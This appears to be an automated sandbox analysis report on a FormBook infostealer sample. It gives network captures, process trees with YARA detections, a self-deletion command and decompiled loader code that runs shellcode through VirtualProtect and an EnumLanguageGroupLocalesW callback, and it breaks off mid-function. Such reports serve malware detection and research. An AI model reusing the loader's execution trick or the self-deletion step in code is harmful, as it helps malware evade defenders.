                                            Aug 3, 2021 22:19:40.547720909 CEST4478INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Tue, 03 Aug 2021 20:01:44 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Data Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d
                                            Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #4288ce; margin: 6px 0 0; font-weight: 400; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-
                                            Aug 3, 2021 22:19:40.547755003 CEST4479INData Raw: 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 74 79 6c 65 3a 20 64 6f 74 74 65 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20
                                            Data Ascii: decoration: underline; text-decoration-style: dotted; } a{ color: #868686; cursor: pointer; } a:hover{ text-decoration: underline; } .line-error{
                                            Aug 3, 2021 22:19:40.547775030 CEST4480INData Raw: 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 30 20 6e 6f 6e 65 3b
                                            Data Ascii: ding: 12px; border: 1px solid #ddd; border-bottom: 0 none; line-height: 18px; font-size:16px; border-top-left-radius: 4px; border-top-right-radius: 4px; font-f
                                            Aug 3, 2021 22:19:40.547797918 CEST4482INData Raw: 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20
                                            Data Ascii: color: #333; height: 100%; display: inline-block; border-left: 1px solid #fff; font-size:14px; font-family: Consolas,"Liberation Mono",Courier,Verdana,""; }
                                            Aug 3, 2021 22:19:40.547816038 CEST4483INData Raw: 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 2d 76 61 72 20 74 61 62 6c 65 20 74 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69
                                            Data Ascii: color: #ccc; } .exception-var table tbody{ font-size: 13px; font-family: Consolas,"Liberation Mono",Courier,""; } .exception-var table td{ padding: 0 6px;
                                            Aug 3, 2021 22:19:40.547830105 CEST4484INData Raw: 63 6f 6c 6f 72 3a 20 23 30 30 38 20 7d 20 20 2f 2a 20 61 20 6d 61 72 6b 75 70 20 74 61 67 20 6e 61 6d 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 61 74 6e 20 7b 20 63 6f 6c 6f 72 3a 20 23 36 30 36 20
                                            Data Ascii: color: #008 } /* a markup tag name */ pre.prettyprint .atn { color: #606 } /* a markup attribute name */ pre.prettyprint .atv { color: #080 } /* a markup attribute value */ pre.prettyprint .dec, pre.prettyprint .var


                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:22:18:09
                                            Start date:03/08/2021
                                            Path:C:\Users\user\Desktop\mvui1vY6Mo.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\mvui1vY6Mo.exe'
                                            Imagebase:0x2f0000
                                            File size:367359 bytes
                                            MD5 hash:059B1244AC9FDA54DE086692DB4B5A08
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:22:18:10
                                            Start date:03/08/2021
                                            Path:C:\Users\user\Desktop\mvui1vY6Mo.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\mvui1vY6Mo.exe'
                                            Imagebase:0x2f0000
                                            File size:367359 bytes
                                            MD5 hash:059B1244AC9FDA54DE086692DB4B5A08
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:22:18:15
                                            Start date:03/08/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff6fee60000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:22:18:52
                                            Start date:03/08/2021
                                            Path:C:\Windows\SysWOW64\cmmon32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                            Imagebase:0x1250000
                                            File size:36864 bytes
                                            MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:22:18:54
                                            Start date:03/08/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\mvui1vY6Mo.exe'
                                            Imagebase:0x11d0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:22:18:54
                                            Start date:03/08/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >

                                              Executed Functions

                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011307B4
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 011307DE
                                              • ReadFile.KERNELBASE(00000000,00000000,0113026C,?,00000000), ref: 011307F5
                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 01130817
                                              • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,011301AE,7FDFFF66), ref: 0113088A
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 01130895
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,011301AE), ref: 011308E0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                              • String ID:
                                              • API String ID: 656311269-0
                                              • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                              • Instruction ID: d3f491d82dbd69a24473577c737763da4e4d65f3f9e060d600d18cc46cf2fdfc
                                              • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                              • Instruction Fuzzy Hash: 4361A031E00709ABDB18DBA8C880BAEBBF5AF9C710F148199F505FB395E7749D418B94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00304CC1
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00304CE9
                                              • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00304D00
                                              • VirtualAlloc.KERNELBASE(00000000,000014A5,00003000,00000040), ref: 00304D49
                                              • und_memcpy.LIBVCRUNTIME ref: 00304D59
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00304D6A
                                              • und_memcpy.LIBVCRUNTIME ref: 00304D79
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: AllocVirtual$Fileund_memcpy$CreateRead
                                              • String ID:
                                              • API String ID: 1653714324-0
                                              • Opcode ID: 9e655a3dfdabb047e96f644093c3ba9801302c57551a3dafedf4f431170e38c9
                                              • Instruction ID: fe576f8e3cdb6a3f455a41e572b14af8d7cc4247133e0c78877aa169c40f32fd
                                              • Opcode Fuzzy Hash: 9e655a3dfdabb047e96f644093c3ba9801302c57551a3dafedf4f431170e38c9
                                              • Instruction Fuzzy Hash: 1751F4B0942624AFEB118B75CC79FEF7BE8EF45310F115155FA40E7292E6749A048B60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F171B() {
                                              				_Unknown_base(*)()* _t1;
                                              
                                              				_t1 = SetUnhandledExceptionFilter(E002F1727); // executed
                                              				return _t1;
                                              			}




                                              0x002f1720
                                              0x002f1726

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00001727,002F10B1), ref: 002F1720
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 7a80d5fe60d2ae55a43193992df627fd7e7c65085a675a49347e890a6b2eba81
                                              • Instruction ID: 284a2480cef46ec0695544d9d98b3df6c2fae6c2b5638bd916b3016e7daa65c5
                                              • Opcode Fuzzy Hash: 7a80d5fe60d2ae55a43193992df627fd7e7c65085a675a49347e890a6b2eba81
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 87%
                                              			E002FCC60(struct HINSTANCE__* _a4) {
                                              				long _v8;
                                              				struct tagMSG _v36;
                                              				struct _WNDCLASSW _v76;
                                              				intOrPtr _t30;
                                              
                                              				_v76.style = 0;
                                              				_v76.lpfnWndProc = 0;
                                              				_v76.cbClsExtra = 0;
                                              				_v76.cbWndExtra = 0;
                                              				_v76.hInstance = 0;
                                              				_v76.hIcon = 0;
                                              				_v76.hCursor = 0;
                                              				_v76.hbrBackground = 0;
                                              				_v76.lpszMenuName = 0;
                                              				_v76.lpszClassName = 0;
                                              				_v76.lpszClassName = 0x304a04;
                                              				_v76.hInstance = _a4;
                                              				_v76.hbrBackground = GetSysColorBrush(0xf);
                                              				_v76.lpfnWndProc = E002FCAB0;
                                              				_v76.hCursor = LoadCursorW(0, 0x7f00);
                                              				RegisterClassW( &_v76);
                                              				E002FC320(_a4, 0x3059b0, 0x3059c4);
                                              				_t30 =  *0x3059b0; // 0x12f0ef0
                                              				 *0x3059c0 = _t30;
                                              				VirtualProtect(0x304b90, 0x28c, 0x40,  &_v8); // executed
                                              				__imp__EnumLanguageGroupLocalesW(0x304b90, 2, 0, 0); // executed
                                              				CreateWindowExW(0, _v76.lpszClassName, L"CLOUDY PEN: beta 0.0", 0x10cf0000, 0x64, 0x64, 0x15e, 0xfa, 0, 0, _a4, 0);
                                              				while(GetMessageW( &_v36, 0, 0, 0) != 0) {
                                              					TranslateMessage( &_v36);
                                              					DispatchMessageW( &_v36);
                                              				}
                                              				return _v36.wParam;
                                              			}







                                              0x002fcc66
                                              0x002fcc6f
                                              0x002fcc72
                                              0x002fcc75
                                              0x002fcc78
                                              0x002fcc7b
                                              0x002fcc7e
                                              0x002fcc81
                                              0x002fcc84
                                              0x002fcc87
                                              0x002fcc8a
                                              0x002fcc94
                                              0x002fcc9f
                                              0x002fcca2
                                              0x002fccb6
                                              0x002fccbd
                                              0x002fcccd
                                              0x002fccd2
                                              0x002fccd7
                                              0x002fccec
                                              0x002fccfd
                                              0x002fcd2b
                                              0x002fcd31
                                              0x002fcd49
                                              0x002fcd53
                                              0x002fcd53
                                              0x002fcd61

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FCC99
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 002FCCB0
                                              • RegisterClassW.USER32 ref: 002FCCBD
                                              • VirtualProtect.KERNELBASE(00304B90,0000028C,00000040,?), ref: 002FCCEC
                                              • EnumLanguageGroupLocalesW.KERNELBASE(00304B90,00000002,00000000,00000000), ref: 002FCCFD
                                              • CreateWindowExW.USER32 ref: 002FCD2B
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002FCD3B
                                              • TranslateMessage.USER32(?), ref: 002FCD49
                                              • DispatchMessageW.USER32 ref: 002FCD53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Message$BrushClassColorCreateCursorDispatchEnumGroupLanguageLoadLocalesProtectRegisterTranslateVirtualWindow
                                              • String ID: CLOUDY PEN: beta 0.0
                                              • API String ID: 1824785041-196906049
                                              • Opcode ID: 38a1beb99710dcac6768da31e043867376f209c08b1f0fb9f33a4d3c4c138b3c
                                              • Instruction ID: 1bc684bc4ca9132823ae970a1d0781f421ec50fc9c7b4ef2174188eefc2bb246
                                              • Opcode Fuzzy Hash: 38a1beb99710dcac6768da31e043867376f209c08b1f0fb9f33a4d3c4c138b3c
                                              • Instruction Fuzzy Hash: 6131ECB0A41308AFEB51DFA4ED5AFEE7BB4AB08B50F104129F609BA2D0D7B05900CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01131149
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: D
                                              • API String ID: 963392458-2746444292
                                              • Opcode ID: 7b4a421de166fbbaeac7bba4d8a8e0671d54247360fafff122133854407e8822
                                              • Instruction ID: 6c46bb4e6b0897ec5adbc3c8ad7d5d3914c0a45a513c285f2043d4e5c418839d
                                              • Opcode Fuzzy Hash: 7b4a421de166fbbaeac7bba4d8a8e0671d54247360fafff122133854407e8822
                                              • Instruction Fuzzy Hash: 54020470E00209EFEB18DF98C985BADBBF5BF48304F244069E515BB295D770AA85CF11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F4EB8(void* __ecx) {
                                              				void* _t6;
                                              				void* _t14;
                                              				void* _t18;
                                              				WCHAR* _t19;
                                              
                                              				_t14 = __ecx;
                                              				_t19 = GetEnvironmentStringsW();
                                              				if(_t19 != 0) {
                                              					_t12 = (E002F4E81(_t19) - _t19 >> 1) + (E002F4E81(_t19) - _t19 >> 1);
                                              					_t6 = E002F3696(_t14, (E002F4E81(_t19) - _t19 >> 1) + (E002F4E81(_t19) - _t19 >> 1)); // executed
                                              					_t18 = _t6;
                                              					if(_t18 != 0) {
                                              						E002FA5E0(_t18, _t19, _t12);
                                              					}
                                              					E002F365C(0);
                                              					FreeEnvironmentStringsW(_t19);
                                              				} else {
                                              					_t18 = 0;
                                              				}
                                              				return _t18;
                                              			}







                                              0x002f4eb8
                                              0x002f4ec2
                                              0x002f4ec6
                                              0x002f4ed7
                                              0x002f4edb
                                              0x002f4ee0
                                              0x002f4ee6
                                              0x002f4eeb
                                              0x002f4ef0
                                              0x002f4ef5
                                              0x002f4efc
                                              0x002f4ec8
                                              0x002f4ec8
                                              0x002f4ec8
                                              0x002f4f07

                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 002F4EBC
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002F4EFC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: EnvironmentStrings$Free
                                              • String ID:
                                              • API String ID: 3328510275-0
                                              • Opcode ID: 912693c7c9a06ac53bc7dfd0dbc625a41d0c42ab2f1cbc66c38982dd1c2e896f
                                              • Instruction ID: 43d697fae9505c35f4d8d123f3c950c7ffe921e8aedf9ab9363d9a19cbe19871
                                              • Opcode Fuzzy Hash: 912693c7c9a06ac53bc7dfd0dbc625a41d0c42ab2f1cbc66c38982dd1c2e896f
                                              • Instruction Fuzzy Hash: D9E02B335145192BD22232297C89E7FAA0CDFC27F17160135F30CC6251EE608E1184B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • ExitProcess.KERNEL32(00000000,00034E5B,00034E5B,00034E5B), ref: 01130BE0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 4841719ca02d087dd677387353d7691451242aab44d5342b267abb8745a2932a
                                              • Instruction ID: eb6116dd9b347da6ac0050cc2cbc031ccb05ad769252bb200a2812c3570daee1
                                              • Opcode Fuzzy Hash: 4841719ca02d087dd677387353d7691451242aab44d5342b267abb8745a2932a
                                              • Instruction Fuzzy Hash: 9F41D619E54348A9DB60DBE4F852BBDB7B1AF48B10F205507F908EE2E0E3750D91D74A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E002F3727(void* __ecx, signed int _a4, signed int _a8) {
